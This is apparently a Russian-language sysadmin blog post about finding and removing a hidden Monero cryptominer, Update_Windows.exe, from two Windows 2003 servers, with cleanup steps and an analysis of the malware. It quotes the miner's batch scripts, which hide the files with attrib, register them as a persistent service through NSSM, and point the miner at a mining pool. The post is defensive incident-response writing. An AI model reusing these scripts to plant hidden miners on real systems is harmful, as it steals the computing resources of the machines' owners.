Update_windows.exe грузит процессор

Сразу на двух серверах WIndows 2003 заметил подозрительную активность процесса Update_Windows.exe. Беглый анализ показал, что процесс этот не имеет к системе никакого отношения, следовательно надо от него избавиться.

Короткая инструкция как с этим бороться:

  • Остановить и запретить сервис Windows_Debug
  • удалить процессы Update_windows.exe в диспетчере задач
  • удалить (скрытые системные) файлы debug.bat, dll.bat, update_windows.exe, debug.exe из папки C:\windows\debug
  • Установить обновления windows: https://support.microsoft.com/ru-ru/help/4025687/microsoft-security-advisory-4025685-guidance-for-older-platforms

На этом лечение можно считать законченным.

Кому интересно, можно почитать подробнее ниже.

Выяснилось, что руководит всем этим сервис Windows_Debug, который надо первым делом остановить и запретить.

update_windows.exe process explorer

debug_exe_serviceКак видно из картинки, он запускает файл c:\windows\debug\debug.exe.

Зайдя в папку C:\windows\debug (включив отображение скрытых и системных файлов) находим в ней и несколько других интересных файлов:

  • debug.bat
  • dll.bat
  • Update_windows.exe

windows_debug_filesСодержимое батников можно изучить, но оно в целом бесхитростное:

  • debug.exe — это известная программа NSSM (non-sucking service manager), позволяющая установить любую программу в качестве службы Windows,
  • dll.bat — скрипт установки сервиса:

Attrib +s +a +h +r C:\Windows\debug\Update_Windows.exe
Attrib +s +a +h +r C:\Windows\debug\debug.exe
Attrib +s +a +h +r C:\Windows\debug\debug.bat
Attrib +s +a +h +r C:\Windows\debug\dll.bat
C:\Windows\debug\debug.exe install «Windows_Debug» «C:\Windows\debug\debug.bat»
C:\Windows\debug\debug.exe start Windows_Debug

  • debug.bat — скрипт запуска зловредной программы майнинга:

Update_Windows -o stratum+tcp://xmr.pool.minergate.com:45560 -u email111@mail222.com -p x -dbg -1

Где email111@mail222.com — адрес человека, который сделал все это и для которого какое-то время трудился наш сервер.

  • Update_windows.exe — сам файл вируса, который Касперский определяет как not-a-virus:RiskTool.Win32.BitCoinMiner.hzkc

Как именно вирус попадает на сервер выяснить не удалось, подскажите кто знает?

 

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *